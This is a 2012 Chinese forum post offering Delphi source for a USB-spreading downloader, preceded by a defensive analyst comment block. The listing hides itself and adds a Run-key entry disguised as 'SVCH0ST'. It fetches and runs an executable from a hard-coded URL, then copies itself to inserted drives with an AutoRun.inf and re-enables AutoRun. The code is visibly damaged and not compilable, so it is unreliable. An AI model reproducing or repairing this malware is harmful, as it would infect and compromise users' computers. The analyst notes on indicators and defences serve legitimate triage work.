ID:1371
Lv.1 韶华一笑间
edit_note帖子 7
stars积分 1,699
event加入 2010-10-04
电脑网络

下载者U盘传染源码

schedule发表于 2012-03-09 05:24:00 visibility查看 350 chat_bubble回复 1
#1 楼主
// Analyst note (defensive reading; the listing below is left exactly as posted).
//
// Behaviour visible in the text:
//  - Form* handler (name masked on this page): sets Application.ShowMainForm to False,
//    builds exefull = <system directory>\SVCH0ST.EXE and reads the value 'SVCH0ST' under
//    HKLM Software\Microsoft\Windows\CurrentVersion\Run. Unless
//    C:\WINDOWS\system32\SVCH0ST.EXE exists and the value equals exefull, it calls Startup.
//  - Startup: writes that Run value through SetRegValue (REG_EXPAND_SZ), fetches the
//    hard-coded URL in Buffer to exefull with URLDownloadToFileA, marks the file
//    hidden+system, shows a message box, then hands the path to a kernel32 import whose
//    name is masked on this page.
//  - WMDeviceChange: on DBT_DEVICEARRIVAL for a logical volume it takes the first set bit
//    of dbcv_unitmask as the drive letter, copies exefull to that drive's root, writes
//    NoDriveTypeAutoRun = 0 under HKCU ...\Policies\Explorer, and rewrites AutoRun.inf with
//    [AutoRun] open=SVCH0ST.EXE. Both files get attribute value 3 (read-only + hidden in
//    the standard attribute bits).
//  - No registry or file API result is checked, apart from RegSetValueEx in SetRegValue.
//
// Text damage: '$$' stands where a single '$' hex prefix is expected, the string quotes are
// typographic, and '*' masks parts of several identifiers. Because the unit is collapsed
// onto two lines, each '//' comment hides the rest of its line. The text is not
// compilable as shown.
//
// Host artefacts named in the listing, useful for triage:
//  - Run value 'SVCH0ST' (digit zero, imitating svchost) pointing at SVCH0ST.EXE in the
//    system directory.
//  - SVCH0ST.EXE plus AutoRun.inf at the root of a newly mounted volume.
//  - NoDriveTypeAutoRun set to 0 under HKCU.
//  NOTE(review): the URL in Buffer looks like a placeholder; confirm before treating it
//  as an indicator.
//
// Defensive angle:
//  - Monitor writes to the Run key and to NoDriveTypeAutoRun.
//  - Alert when an executable and an AutoRun.inf with an open= entry appear together on
//    removable media.
//  - Keep AutoRun disabled by machine policy.
//  NOTE(review): the writes to HKLM and the system directory presumably need an elevated
//  user; confirm against the target OS.
unit Un_Main; interface uses Windows, Messages, SysUtils,Forms,IniFiles; type TFrm_Main = class(TForm) procedure Form*(Sender: TObject); procedure FormClose(Sender: TObject; var Action: TCloseAction); private procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE; public { Public declarations } end; const exefile = ‘SVCH0ST.EXE‘; Buffer = ‘http://www.888.com/hello.exe‘; DBT_DEVICEARRIVAL = $$8000; // system detected a new device DBT_DEVICEREMOVECOMPLETE = $$8004; // device is gone DBT_DEVTYP_VOLUME = $$00000002; // logical volume DBTF_MEDIA = $$0001; // media comings and goings type PDEV_BROADCAST_HDR = ^TDEV_BROADCAST_HDR; TDEV_BROADCAST_HDR = packed record dbch_size : DWORD; dbch_devicetype : DWORD; dbch_reserved : DWORD; end; PDEV_BROADCAST_VOLUME = ^TDEV_BROADCAST_VOLUME; TDEV_BROADCAST_VOLUME = packed record dbcv_size : DWORD; dbcv_devicetype : DWORD; dbcv_reserved : DWORD; dbcv_unitmask : DWORD; dbcv_flags : WORD; end; function UrlDownLoadToFile(Caller,URL,FileName: PAnsiChar;Reserved: LongWord; StatusCB: Pointer): LongWord; stdcall; external ‘URLMON.DLL‘ name ‘URLDownloadToFileA‘; function Win*(lpCmdline: PAnsiChar; uCmdShow: LongWord): LongWord; stdcall; external ‘kernel32.dll‘ name ‘Win*‘; var Frm_Main: TFrm_Main; exefull:string; implementation {$$R *.dfm} function SetRegValue(key:Hkey; subkey,name,value:string):boolean; var regkey:hkey; begin result := false; Reg*Key(key,PChar(subkey),regkey); if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then result := true; RegCloseKey(regkey); end; procedure Startup(var TheName:string); begin SetRegValue(HKEY_LOCAL_MACHINE,‘Software\Microsoft\Windows\CurrentVersion\Run‘,‘SVCH0ST‘,TheName); UrlDownloadToFile(nil, PChar(Buffer), PChar(TheName), 0, nil); SetFileAttributes(PChar(TheName),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM); messagebox(0,‘文件下载成功!‘,‘成功‘,MB_OK); Win*(PChar(TheName), SW_SHOWDEFAULT); //Sleep(500); //*Me; //freemem(@path,256); end; procedure 
TFrm_Main.WMDeviceChange(var Msg: TMessage); var lpdb : PDEV_BROADCAST_HDR; lpdbv : PDEV_BROADCAST_VOLUME; unitmask:DWORD; i:integer; MyIni:TIniFile; s:Hkey; value:dword ; inifile:string; begin lpdb := PDEV_BROADCAST_HDR(Msg.LParam); case Msg.WParam of DBT_DEVICEARRIVAL ://有设备安装完毕 if lpdb.dbch_devicetype=DBT_DEVTYP_VOLUME then begin lpdbv := PDEV_BROADCAST_VOLUME(lpdb); unitmask:=lpdbv.dbcv_unitmask;//取得设备的盘符 for i:=0 to 25 do //遍历磁盘 begin if Boolean(unitmask and $$1)then//看该驱动器的状态是否发生了变化 break; unitmask := unitmask shr 1; end; if fileexists(exefull) then //向u盘拷文件 begin copyfile(PChar(exefull),Pchar(char(i+65) + ‘:\‘ + exefile),false); FileSetAttr(char(i+65) + ‘:\‘ + exefile,$$00000003); end; inifile:=char(i+65)+‘:\AutoRun.inf‘;//ini文件 RegOpenKeyEx(HKEY_CURRENT_USER, ‘Software\Microsoft\Windows\CurrentVersion\Policies\Explorer‘, 0, KEY_ALL_ACCESS, s); value:=0; RegSetValueEx(s,‘NoDriveTypeAutoRun‘,0, REG_DWORD,@value, sizeof(value)); RegCloseKey(s); if fileexists(inifile) then begin FileSetAttr(inifile,$$00000000); *File(inifile); end; MyIni := TIniFile.*(inifile); MyIni.WriteString(‘AutoRun‘, ‘open‘,exefile); FileSetAttr(inifile,$$00000003); end; end; end; procedure TFrm_Main.Form*(Sender: TObject); var s:hkey; value:array*0..255*of char; size:*inal; path:array*0..255* of char; begin Application.ShowMainForm:=False; getsystemdirectory(path,120); exefull := strpas(path) + ‘\‘ + exefile; size:=256; RegOpenKeyEx(HKEY_LOCAL_MACHINE,‘Software\Microsoft\Windows\CurrentVersion\Run‘,0,KEY_ALL_ACCESS,s); RegQueryValueEx(s,‘SVCH0ST‘,nil,nil,@value,@size); RegCloseKey(s); //文件存在且有自启动 if fileexists(‘C:\WINDOWS\system32\SVCH0ST.EXE‘) and (UpperCase(value) = UpperCase(exefull)) then messagebox(0,‘自启动成功!‘,‘成功‘,MB_OK) else Startup(exefull);//下载执行函数 end; procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction); begin Application.Terminate; end; end.

全部回复 (1)

ID:19090
Lv.1 韶华一笑间
2012-03-09 06:29:00 沙发
乱码!